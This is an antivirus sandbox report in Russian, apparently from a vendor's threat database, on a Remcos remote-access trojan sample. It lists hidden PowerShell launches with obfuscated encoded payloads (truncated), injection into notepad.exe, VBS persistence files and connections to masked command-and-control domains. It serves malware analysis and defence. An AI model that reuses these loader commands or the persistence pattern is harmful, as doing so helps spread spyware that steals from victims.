Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92|72|37|26|67|E2|46|16|07|56|47|F6|E6|C5|72|02|B2|14|45|14|44|05|05|14|A3|67|E6|56|42|82|37|37|56|36|F6|27|07|D2|47|27|16|47|37|02|B3|85|06|54|06|94|C7|72|92|72|72|37|26|67|E2|46|16|...
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\notepad.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\notepad.vbs
- %LOCALAPPDATA%\notepad.vbs
- %APPDATA%\remcos\logs.dat
Сетевая активность
Подключается к
- 'fu###ubusa.com':80
- 'is######cker.duckdns.org':672
TCP
- 'is######cker.duckdns.org':672
UDP
- DNS ASK fu###ubusa.com
- DNS ASK is######cker.duckdns.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\notepad.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92|72|37|26|67|E2|46|16|07|56|47|F6|E6|C5|72|02|B2|14|45|14|44|05|05|14|A3|67|E6|56|42|82|37|37|56|36|F6|27|07|D2|47|27|16|47|37|02|B3|85|06|54|06|94|C7|72|92|72|72|37|26|67|E2|46|16|...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ;$kkjQdCCAwhlGQQPKLtHS='P4%PF%20%7B%24%70%P9%PE%P7%20%3D%20%74%PW%73%74%2D%P3%PF%PE%PE%PW%P3%74%P9%PF%PE%20%2D%P3%PF%PD%70%20%P7%PF%PF%P7%PC%PW%2E%P3%PF%PD%20%2D%P3%PF%7W%PE%74%20%31%20%2D%W1%7...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notepad.vbs" "%LOCALAPPDATA%" /Y' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ;$kkjQdCCAwhlGQQPKLtHS='P4%PF%20%7B%24%70%P9%PE%P7%20%3D%20%74%PW%73%74%2D%P3%PF%PE%PE%PW%P3%74%P9%PF%PE%20%2D%P3%PF%PD%70%20%P7%PF%PF%P7%PC%PW%2E%P3%PF%PD%20%2D%P3%PF%7W%PE%74%20%31%20%2D%W1%7...
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notepad.vbs" "%LOCALAPPDATA%" /Y
- '%WINDIR%\syswow64\notepad.exe'
